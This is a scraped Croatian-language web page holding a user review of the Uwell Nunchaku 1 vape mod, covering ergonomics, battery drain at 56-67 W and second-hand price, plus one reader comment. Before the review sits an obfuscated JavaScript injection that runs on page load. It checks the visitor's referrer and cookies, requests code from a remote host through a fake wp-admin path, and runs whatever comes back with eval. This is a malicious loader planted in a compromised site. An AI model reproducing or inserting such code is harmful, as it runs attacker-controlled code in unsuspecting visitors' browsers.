;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Uwell Nunchaku 1

MOD Uwell Nunchaku 1

Review by Joško

Vlasnik sam ovog Uwell Nunchaku 1 moda cca mjesec dana. Pa nekoliko crtica o njemu za buduće kupce. 

Mod fino izgleda, jednostavan je za koristit i dobro leži u ruci. Baterija se umetne odozdo kad se odšarafi poklopac. 

Iako dolazi u kompletu sa rda driperom, mišljenja sam da je mod idealan za mtl i rdl načine parenja. Kako ja na njemu koristim profile Unity mesh, na nekih 56-67 wata, u danu promijenim i do 4 baterije kod intenzivnijeg vejpanja, a koristim vtc6 baterije. Puno brže troši bateriju na visokoj watsži nego npr Pico sa arctic foxom. 

Ok, znam da visoke wataže općenito brže potroše baterije, ali po mom mišljenju za mtl i rdl odličan radni mod. Prejednostavan a kvalitetan. 

Dakle ako ste početnik, a ne daje vam se puno novčića za mod, Nunchaku se nađe od 100-200 kn po oglasniku i zadovoljiti će sve vaše potrebe. 

Plus: jednostavan za korištenje, dobra ergonomija, lijepo “leži” u ruci. Cijena, vrijednost za novac, funkcionalnost

Minus: brzo troši bateriju , nema opciju arctic fox.

Joško Jaman

Choose your Reaction!
  • Bravo za recenziju, e ovo bih mogao pogledati, samo gdje ga pronaći. Nije baš da ih ima na bacanje u second hand ponudi ;)

Leave a Comment